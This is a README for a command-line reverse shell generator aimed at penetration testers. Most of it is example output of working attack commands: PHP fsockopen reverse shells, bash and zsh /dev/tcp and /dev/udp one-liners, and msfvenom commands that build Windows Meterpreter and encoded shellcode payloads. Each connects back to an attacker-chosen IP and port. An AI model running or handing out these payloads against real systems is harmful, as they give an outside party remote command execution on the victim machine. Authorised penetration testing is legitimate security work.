# Rever Shell Cli Generator

    A command line utility for pen-testing daily basics

Thanks to [this project](https://github.com/0dayCTF/reverse-shell-generator) for the inspiration and data.


## USE

```
python3 revshell-cli.py -h
usage: revshell-cli.py [-h] lang shell ip port

A Simple cli RevShell generator. Data from:
https://github.com/0dayCTF/reverse-shell-generator/

positional arguments:
  lang        Select code laguague from
  shell       Kind of shell to invoque
  ip          Your local ip address
  port        Port to lisent

optional arguments:
  -h, --help  show this help message and exit
```

### Examples

#### php revese shell with sh
```
python3 revshell-cli.py php sh 1.0.0.1 1234
```

```
php -r '$sock=fsockopen("1.0.0.1",1234);exec("sh <&3 >&3 2>&3");' 

php -r '$sock=fsockopen("1.0.0.1",1234);shell_exec("sh <&3 >&3 2>&3");' 

php -r '$sock=fsockopen("1.0.0.1",1234);system("sh <&3 >&3 2>&3");' 

php -r '$sock=fsockopen("1.0.0.1",1234);passthru("sh <&3 >&3 2>&3");' 

php -r '$sock=fsockopen("1.0.0.1",1234);`sh <&3 >&3 2>&3`;' 

php -r '$sock=fsockopen("1.0.0.1",1234);popen("sh <&3 >&3 2>&3", "r");' 
```


### Bash Revese shell with zsh
```
python3 revshell-cli.py bash zsh 2.2.2.245 8756
```

```
zsh -i >& /dev/tcp/2.2.2.245/8756 0>&1 

0<&196;exec 196<>/dev/tcp/2.2.2.245/8756; zsh <&196 >&196 2>&196 

exec 5<>/dev/tcp/2.2.2.245/8756;cat <&5 | while read line; do $line 2>&5 >&5; done 

zsh -i 5<> /dev/tcp/2.2.2.245/8756 0<&5 1>&5 2>&5 

zsh -i >& /dev/udp/2.2.2.245/8756 0>&1
```
### Meterpreter Windows

```
python3 revshell-cli.py meter win 9.9.1.2 88
```
```
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=9.9.1.2 LPORT=88 -f exe -o reverse.exe 

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=9.9.1.2 LPORT=88 -f exe -o reverse.exe 

msfvenom -p windows/x64/reverse_tcp LHOST=9.9.1.2 LPORT=88 -f exe -o reverse.exe 

msfvenom -p windows/x64/shell_reverse_tcp LHOST=9.9.1.2 LPORT=88 -f exe -o reverse.exe 

msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -f python -v notBuf -o shellcode 
```

